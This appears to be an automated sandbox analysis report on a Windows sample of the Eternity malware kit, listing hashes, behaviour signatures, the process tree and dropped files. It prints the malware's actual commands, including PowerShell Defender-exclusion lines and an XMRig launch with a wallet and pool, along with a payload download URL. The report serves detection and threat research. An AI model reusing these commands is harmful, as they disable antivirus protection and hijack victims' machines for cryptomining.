Analysis

  • max time kernel
    146s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-05-2023 23:42

General

  • Target

    e4dd163e969aa6a51bf446a2e7b1f083ba79883e600516932eccba94e275a47e.exe

  • Size

    987KB

  • MD5

    f69660e01c5042b49fc54d40dbe5ed85

  • SHA1

    90a201a5c46cb0836078c4decac08b1d2fdf946a

  • SHA256

    e4dd163e969aa6a51bf446a2e7b1f083ba79883e600516932eccba94e275a47e

  • SHA512

    b5230e013371304312576c749254d580b52b2457ffefd125a0562199a18872490c4a6a8d430659db9be40ba4e645870ae83a48a39d36a0ea58496f1b84b31238

  • SSDEEP

    12288:lToPWBv/cpGrU3y4CDk2VCJl5stacV9u9QDCNy+scbYVlpwUnqSaqJVt2eEkcVw0:lTbBv5rUqDC3YmJYVwYIqcRyw

Malware Config

Extracted

Family

eternity

Wallets

48zNQwXLksrS7S3ohbWAKRTYWu5htM4FG4sa9iz6LzgWj6ebFQzyJe9aWJbw4nsHR7KQyDrXKG6bxKQTJdj9Uhu138L9FDz

Attributes
  • payload_urls

    http://81.161.229.110:8080/upload/xmrig.exe

Signatures

  • Eternity

    Eternity Project is a malware kit offering an info stealer, clipper, worm, coin miner, ransomware, and DDoS bot.

  • XMRig Miner payload 6 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Disables Task Manager via registry modification
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 35 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 14 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\e4dd163e969aa6a51bf446a2e7b1f083ba79883e600516932eccba94e275a47e.exe
    "C:\Users\Admin\AppData\Local\Temp\e4dd163e969aa6a51bf446a2e7b1f083ba79883e600516932eccba94e275a47e.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:664
    • C:\Windows\SysWOW64\wscript.exe
      "C:\Windows\System32\wscript.exe" Update-rb.x.vbe
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:2744
      • C:\Users\Admin\AppData\Local\Temp\qlws\dtgur.pif
        "C:\Users\Admin\AppData\Local\Temp\qlws\dtgur.pif" tkdk.txt
        3⤵
        • Checks computer location settings
        • Drops startup file
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:1692
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\qlws
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3444
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -Command Add-MpPreference -ExclusionProcess 'RegSvcs.exe'
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4816
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionProcess RegSvcs.exe
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:216
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -Command Add-MpPreference -ExclusionExtension '.vbs'
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3824
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionExtension .vbs
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2292
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -Command Add-MpPreference -ExclusionExtension '.vbe'
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1836
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionExtension .vbe
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1420
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -Command Add-MpPreference -ExclusionExtension '*.vbs'
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4664
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionExtension *.vbs
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4404
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -Command Add-MpPreference -ExclusionExtension '*.vbe'
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4624
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionExtension *.vbe
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4944
        • C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe
          "C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4508
          • C:\Users\Admin\AppData\Local\Temp\Admin_TLGENAJY.exe
            "C:\Users\Admin\AppData\Local\Temp\Admin_TLGENAJY.exe" -a cryptonight -o xmr.2miners.com:2222 -u 48zNQwXLksrS7S3ohbWAKRTYWu5htM4FG4sa9iz6LzgWj6ebFQzyJe9aWJbw4nsHR7KQyDrXKG6bxKQTJdj9Uhu138L9FDz.Admin_TLGENAJY -p x --max-cpu-usage=20 --donate-level=1
            5⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:2384

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    968cb9309758126772781b83adb8a28f

    SHA1

    8da30e71accf186b2ba11da1797cf67f8f78b47c

    SHA256

    92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

    SHA512

    4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    e28ddc0cd377301831174e744852245f

    SHA1

    aeafe58a5076933b5ccc504435c5f8aa5b2fe375

    SHA256

    54cb0ab6ce6407d7717ff542ec05d252350cac23cdf38b28eff35e032b086eb6

    SHA512

    569cbc06ec01579083dcba138f1fe420e0c4ce51cb28f985b9f0c754c08325fd0f6163854834ec8181024f9996bfad1a09c9cb9f9c6288c3542ddb84f646f0fd

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    37bec41fe9782e7e924a1642027be76f

    SHA1

    008b27ca4793718bc945dd537dd5c2dd27b6add5

    SHA256

    4b8a3a624537238b90e15f9187a211de151e9f7e8fb30bea358ecb48acb6d144

    SHA512

    7bfc6cf83c6c61f5af66f859ad6ec8222cc48db4867655a9824e5569f64bc053fba3d7a49ad668e579512570c7f095fa275d685b7f9202eb07e93d62acb79236

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    11KB

    MD5

    6ba41e36640b2d0d8641749a76cf2266

    SHA1

    3c7ff93d27302abda616b3e271546743a0570e60

    SHA256

    fe23904a5c30384c7041cb9a6d1f06bede938d9a4f57d795e1cbe36cb3cee979

    SHA512

    15ebd44c986ebc85bf6832b321b3f4aa089ed16103c5683e6a15749004949bc24ca6dc99d3494663326a89a9d9f7ae1bedb1f14a755377297f4923ff23546515

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    11KB

    MD5

    6ba41e36640b2d0d8641749a76cf2266

    SHA1

    3c7ff93d27302abda616b3e271546743a0570e60

    SHA256

    fe23904a5c30384c7041cb9a6d1f06bede938d9a4f57d795e1cbe36cb3cee979

    SHA512

    15ebd44c986ebc85bf6832b321b3f4aa089ed16103c5683e6a15749004949bc24ca6dc99d3494663326a89a9d9f7ae1bedb1f14a755377297f4923ff23546515

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    11KB

    MD5

    6ba41e36640b2d0d8641749a76cf2266

    SHA1

    3c7ff93d27302abda616b3e271546743a0570e60

    SHA256

    fe23904a5c30384c7041cb9a6d1f06bede938d9a4f57d795e1cbe36cb3cee979

    SHA512

    15ebd44c986ebc85bf6832b321b3f4aa089ed16103c5683e6a15749004949bc24ca6dc99d3494663326a89a9d9f7ae1bedb1f14a755377297f4923ff23546515

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    11KB

    MD5

    3ccafa46905bb6b36884c4a8a49f6619

    SHA1

    a31aca8b3586560b2f4b392fa413dc8296ac1362

    SHA256

    6b1c9baf6b424cd90760e88dd46a33172d1adb061a2387787361cb781e42c4fc

    SHA512

    f8c3f7d13b26c69cefb4577b4a57272235bca930336cb05812d9884a3927eafe3d573ffb8396052e6de6f6a811282e7c67bf58485fdc26c6051adbc0ede3a633

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    f741d77394225e117139597fdce7b59e

    SHA1

    33022123360051d03cb82fcb23f2b010e05dd95a

    SHA256

    4cf131a28efbf6a35b2980943771095ce08f20c8a6b4ade70bb90aff17cb05ae

    SHA512

    67d4fd8e6155d0d8de29a31ce52db7892b89d59255fad8c2552e13aa97879c584b7a5fd65416b59903151c6949d939434b038cdabdc52f51df3b20f6f666792f

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    11KB

    MD5

    e6fa4f1bc20275d20a2b1dc29cde93b8

    SHA1

    a16303028ec8d318d5e719d9b6eede94cc6c5870

    SHA256

    42b0478b3b878e693ba8c56355180b17066864a45122b55d16cbebea5b2e996e

    SHA512

    1e27f18eea3f9c547968d1ecf37f45a055d7ca35d4c5e47d4e35b9495ad2da54c992e22abb0b472531590c1aa9ad1b69b34b356554bc8dd53d1555298c4d1afb

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    11KB

    MD5

    e6fa4f1bc20275d20a2b1dc29cde93b8

    SHA1

    a16303028ec8d318d5e719d9b6eede94cc6c5870

    SHA256

    42b0478b3b878e693ba8c56355180b17066864a45122b55d16cbebea5b2e996e

    SHA512

    1e27f18eea3f9c547968d1ecf37f45a055d7ca35d4c5e47d4e35b9495ad2da54c992e22abb0b472531590c1aa9ad1b69b34b356554bc8dd53d1555298c4d1afb

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    11KB

    MD5

    58f3bf0e2994014f81677a41fff975c7

    SHA1

    348c4ebaad230224896cfb80648c08bd197dec5a

    SHA256

    2d702eef42c2de6562dd60b559bdfd3da1adf551b1d36092e7c8a0c0ee26dbc9

    SHA512

    2fdeb88e7a5ae841be20aff2effd2eb231fe352aa5b1d3f57bcf67f8f6267e9026f8fc546a22643defebdbf0b193abeaa88272419a9f8548866d94a0a617605b

  • C:\Users\Admin\AppData\Local\Temp\Admin_TLGENAJY.exe

    Filesize

    4.7MB

    MD5

    84cbc72865b542c646bd89bb9430e7d1

    SHA1

    c8320b1e24f22b36c1a283506dacdcbcf5598a4f

    SHA256

    323a18d661fab8c743bb0584b4182902f49640a9ead4b9cedfb548889c25a9d4

    SHA512

    235afdba7fcf029920a20ac3d99ce0dacd87554d27a0e473ff5636c74f7f747ed9d242637d10963bac7461f789266191b37beaec0b9acdd2dc38b0f196ae65a8

  • C:\Users\Admin\AppData\Local\Temp\Admin_TLGENAJY.exe

    Filesize

    4.7MB

    MD5

    84cbc72865b542c646bd89bb9430e7d1

    SHA1

    c8320b1e24f22b36c1a283506dacdcbcf5598a4f

    SHA256

    323a18d661fab8c743bb0584b4182902f49640a9ead4b9cedfb548889c25a9d4

    SHA512

    235afdba7fcf029920a20ac3d99ce0dacd87554d27a0e473ff5636c74f7f747ed9d242637d10963bac7461f789266191b37beaec0b9acdd2dc38b0f196ae65a8

  • C:\Users\Admin\AppData\Local\Temp\Admin_TLGENAJY.exe

    Filesize

    4.7MB

    MD5

    84cbc72865b542c646bd89bb9430e7d1

    SHA1

    c8320b1e24f22b36c1a283506dacdcbcf5598a4f

    SHA256

    323a18d661fab8c743bb0584b4182902f49640a9ead4b9cedfb548889c25a9d4

    SHA512

    235afdba7fcf029920a20ac3d99ce0dacd87554d27a0e473ff5636c74f7f747ed9d242637d10963bac7461f789266191b37beaec0b9acdd2dc38b0f196ae65a8

  • C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe

    Filesize

    44KB

    MD5

    9d352bc46709f0cb5ec974633a0c3c94

    SHA1

    1969771b2f022f9a86d77ac4d4d239becdf08d07

    SHA256

    2c1eeb7097023c784c2bd040a2005a5070ed6f3a4abf13929377a9e39fab1390

    SHA512

    13c714244ec56beeb202279e4109d59c2a43c3cf29f90a374a751c04fd472b45228ca5a0178f41109ed863dbd34e0879e4a21f5e38ae3d89559c57e6be990a9b

  • C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe

    Filesize

    44KB

    MD5

    9d352bc46709f0cb5ec974633a0c3c94

    SHA1

    1969771b2f022f9a86d77ac4d4d239becdf08d07

    SHA256

    2c1eeb7097023c784c2bd040a2005a5070ed6f3a4abf13929377a9e39fab1390

    SHA512

    13c714244ec56beeb202279e4109d59c2a43c3cf29f90a374a751c04fd472b45228ca5a0178f41109ed863dbd34e0879e4a21f5e38ae3d89559c57e6be990a9b

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jpjbuuyo.2ew.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\qlws\XXSARS~1.CHJ

    Filesize

    19KB

    MD5

    8d6abf19d2a19f83ebb4a7f99b85f4df

    SHA1

    9feb56c48d477613630d5d14e98893a9b657b9a1

    SHA256

    6d376bde081e5b002b151c5cef3b74e10662706b45c073e01e517861496477ad

    SHA512

    81653da23ba799e9a7a0c44103d0bac9baf255750d3216b9de98a0fa596f5d9adb11d62d0317d0f667f969187b5ea8705124e46249426108d4a15c9b92405389

  • C:\Users\Admin\AppData\Local\Temp\qlws\dqgunhpck.dat

    Filesize

    34KB

    MD5

    99333b25ae87f19b7286cb79468fe752

    SHA1

    e4f2856998ea9cd0fcf4c22ad3f5511706ac24b0

    SHA256

    48b4ce0b76dad15e66a9114be253cfa2ba4359eb72a5324274a3e27b1901f706

    SHA512

    28c8663cc0e462578299540c425b87d9eebd4d82cfa5d5dff9e933769b9b71712888221dde764127ffb695fc0ed3846ef56d69c6ddc93c5118dd67960b1b586e

  • C:\Users\Admin\AppData\Local\Temp\qlws\dtgur.pif

    Filesize

    1.1MB

    MD5

    09d54311f77fa401dece8d1734e36510

    SHA1

    2eb9251103d0b1e7f8756f40e5e8316b1e9d2f8a

    SHA256

    7b9407c7f51386c6c33d6a4fff25e6971811c094013b5a286213f928dfbac7ef

    SHA512

    00f650b39c765506034532731c9f9ad892d363d5f1263b008b90b00609d029b5e2149a077eda553093d40d39e086900bd75ca8d2fb0efaac2ae09f81727731aa

  • C:\Users\Admin\AppData\Local\Temp\qlws\dtgur.pif

    Filesize

    1.1MB

    MD5

    09d54311f77fa401dece8d1734e36510

    SHA1

    2eb9251103d0b1e7f8756f40e5e8316b1e9d2f8a

    SHA256

    7b9407c7f51386c6c33d6a4fff25e6971811c094013b5a286213f928dfbac7ef

    SHA512

    00f650b39c765506034532731c9f9ad892d363d5f1263b008b90b00609d029b5e2149a077eda553093d40d39e086900bd75ca8d2fb0efaac2ae09f81727731aa

  • C:\Users\Admin\AppData\Local\Temp\qlws\tkdk.txt

    Filesize

    104.6MB

    MD5

    e8e6f0c83a1d2a1b9b23d200a17b096b

    SHA1

    2500a32437e7f87cc5d4a0660b4eb653e4c781e3

    SHA256

    499faa4fabbaa904490bc115a7ac3211f8451f308f34fab8a66a9497aeaffd19

    SHA512

    0e86c1e1707fd3e2a04bd5284e484b933e4de5ac69d73283c9c9e09f9aeca8fa098a56dcacd90233e0bc664963348436654f87682902eae69ab41d80cb5613ec

  • C:\Users\Admin\AppData\Local\temp\qlws\Update-rb.x.vbe

    Filesize

    73KB

    MD5

    f94f3bac362151b0a0115ccd9fb5738b

    SHA1

    330aff3f4d3227ff9049163c474c9086bd90791b

    SHA256

    ead3b623eb9b373003eb151d47f142271fb2d3c33dc7648a19be8b8f75ad1d09

    SHA512

    3fb4fba989ca978f6b8be0e137f9d00530064228e32806706d5d095c3fb98a6b02c3c9391260655dca4463aebb298a1be88487eede1f21e1cf52abd183732677

  • memory/216-468-0x000000006FA90000-0x000000006FADC000-memory.dmp

    Filesize

    304KB

  • memory/216-388-0x0000000003040000-0x0000000003050000-memory.dmp

    Filesize

    64KB

  • memory/216-394-0x0000000003040000-0x0000000003050000-memory.dmp

    Filesize

    64KB

  • memory/216-502-0x000000007F490000-0x000000007F4A0000-memory.dmp

    Filesize

    64KB

  • memory/1420-497-0x000000007F310000-0x000000007F320000-memory.dmp

    Filesize

    64KB

  • memory/1420-363-0x0000000004930000-0x0000000004940000-memory.dmp

    Filesize

    64KB

  • memory/1420-362-0x0000000004930000-0x0000000004940000-memory.dmp

    Filesize

    64KB

  • memory/1420-421-0x0000000004930000-0x0000000004940000-memory.dmp

    Filesize

    64KB

  • memory/1420-425-0x000000006FA90000-0x000000006FADC000-memory.dmp

    Filesize

    304KB

  • memory/1836-483-0x0000000002B60000-0x0000000002B70000-memory.dmp

    Filesize

    64KB

  • memory/1836-280-0x0000000005DA0000-0x0000000005E06000-memory.dmp

    Filesize

    408KB

  • memory/1836-467-0x0000000002B60000-0x0000000002B70000-memory.dmp

    Filesize

    64KB

  • memory/1836-274-0x0000000002B60000-0x0000000002B70000-memory.dmp

    Filesize

    64KB

  • memory/1836-271-0x0000000002B60000-0x0000000002B70000-memory.dmp

    Filesize

    64KB

  • memory/1836-335-0x00000000063E0000-0x00000000063FE000-memory.dmp

    Filesize

    120KB

  • memory/2292-489-0x0000000004BF0000-0x0000000004C00000-memory.dmp

    Filesize

    64KB

  • memory/2292-405-0x0000000004BF0000-0x0000000004C00000-memory.dmp

    Filesize

    64KB

  • memory/2292-503-0x000000007F8C0000-0x000000007F8D0000-memory.dmp

    Filesize

    64KB

  • memory/2292-488-0x000000006FA90000-0x000000006FADC000-memory.dmp

    Filesize

    304KB

  • memory/2384-479-0x00000265858A0000-0x00000265858C0000-memory.dmp

    Filesize

    128KB

  • memory/2384-504-0x00000265872B0000-0x00000265872F0000-memory.dmp

    Filesize

    256KB

  • memory/3444-419-0x0000000004FD0000-0x0000000004FDA000-memory.dmp

    Filesize

    40KB

  • memory/3444-501-0x0000000007820000-0x0000000007828000-memory.dmp

    Filesize

    32KB

  • memory/3444-420-0x0000000007830000-0x00000000078C6000-memory.dmp

    Filesize

    600KB

  • memory/3444-417-0x000000007F7A0000-0x000000007F7B0000-memory.dmp

    Filesize

    64KB

  • memory/3444-266-0x00000000029A0000-0x00000000029D6000-memory.dmp

    Filesize

    216KB

  • memory/3444-500-0x00000000078F0000-0x000000000790A000-memory.dmp

    Filesize

    104KB

  • memory/3444-416-0x00000000075A0000-0x00000000075BA000-memory.dmp

    Filesize

    104KB

  • memory/3444-376-0x0000000002960000-0x0000000002970000-memory.dmp

    Filesize

    64KB

  • memory/3444-273-0x0000000002960000-0x0000000002970000-memory.dmp

    Filesize

    64KB

  • memory/3444-279-0x00000000059D0000-0x0000000005A36000-memory.dmp

    Filesize

    408KB

  • memory/3444-415-0x0000000007BE0000-0x000000000825A000-memory.dmp

    Filesize

    6.5MB

  • memory/3444-404-0x0000000006820000-0x000000000683E000-memory.dmp

    Filesize

    120KB

  • memory/3444-278-0x00000000051E0000-0x0000000005202000-memory.dmp

    Filesize

    136KB

  • memory/3444-482-0x00000000077D0000-0x00000000077DE000-memory.dmp

    Filesize

    56KB

  • memory/3444-386-0x0000000006840000-0x0000000006872000-memory.dmp

    Filesize

    200KB

  • memory/3444-393-0x000000006FA90000-0x000000006FADC000-memory.dmp

    Filesize

    304KB

  • memory/3444-481-0x0000000002960000-0x0000000002970000-memory.dmp

    Filesize

    64KB

  • memory/3824-269-0x00000000052A0000-0x00000000052B0000-memory.dmp

    Filesize

    64KB

  • memory/3824-444-0x00000000052A0000-0x00000000052B0000-memory.dmp

    Filesize

    64KB

  • memory/3824-485-0x00000000052A0000-0x00000000052B0000-memory.dmp

    Filesize

    64KB

  • memory/4404-378-0x00000000052C0000-0x00000000052D0000-memory.dmp

    Filesize

    64KB

  • memory/4404-443-0x000000006FA90000-0x000000006FADC000-memory.dmp

    Filesize

    304KB

  • memory/4404-423-0x00000000052C0000-0x00000000052D0000-memory.dmp

    Filesize

    64KB

  • memory/4404-377-0x00000000052C0000-0x00000000052D0000-memory.dmp

    Filesize

    64KB

  • memory/4508-366-0x00000000005B0000-0x00000000005BA000-memory.dmp

    Filesize

    40KB

  • memory/4508-418-0x0000000002C00000-0x0000000002C10000-memory.dmp

    Filesize

    64KB

  • memory/4508-384-0x0000000005610000-0x0000000005BB4000-memory.dmp

    Filesize

    5.6MB

  • memory/4508-361-0x00000000005B0000-0x0000000000C13000-memory.dmp

    Filesize

    6.4MB

  • memory/4624-486-0x00000000031A0000-0x00000000031B0000-memory.dmp

    Filesize

    64KB

  • memory/4624-277-0x00000000031A0000-0x00000000031B0000-memory.dmp

    Filesize

    64KB

  • memory/4624-267-0x0000000005C10000-0x0000000006238000-memory.dmp

    Filesize

    6.2MB

  • memory/4624-487-0x00000000031A0000-0x00000000031B0000-memory.dmp

    Filesize

    64KB

  • memory/4624-276-0x00000000031A0000-0x00000000031B0000-memory.dmp

    Filesize

    64KB

  • memory/4664-442-0x0000000004920000-0x0000000004930000-memory.dmp

    Filesize

    64KB

  • memory/4664-480-0x0000000004920000-0x0000000004930000-memory.dmp

    Filesize

    64KB

  • memory/4664-272-0x0000000004920000-0x0000000004930000-memory.dmp

    Filesize

    64KB

  • memory/4664-268-0x0000000004920000-0x0000000004930000-memory.dmp

    Filesize

    64KB

  • memory/4816-484-0x0000000004C50000-0x0000000004C60000-memory.dmp

    Filesize

    64KB

  • memory/4816-275-0x0000000004C50000-0x0000000004C60000-memory.dmp

    Filesize

    64KB

  • memory/4816-465-0x0000000004C50000-0x0000000004C60000-memory.dmp

    Filesize

    64KB

  • memory/4816-270-0x0000000004C50000-0x0000000004C60000-memory.dmp

    Filesize

    64KB

  • memory/4944-445-0x000000006FA90000-0x000000006FADC000-memory.dmp

    Filesize

    304KB

  • memory/4944-387-0x0000000000D50000-0x0000000000D60000-memory.dmp

    Filesize

    64KB

  • memory/4944-385-0x0000000000D50000-0x0000000000D60000-memory.dmp

    Filesize

    64KB

  • memory/4944-422-0x0000000000D50000-0x0000000000D60000-memory.dmp

    Filesize

    64KB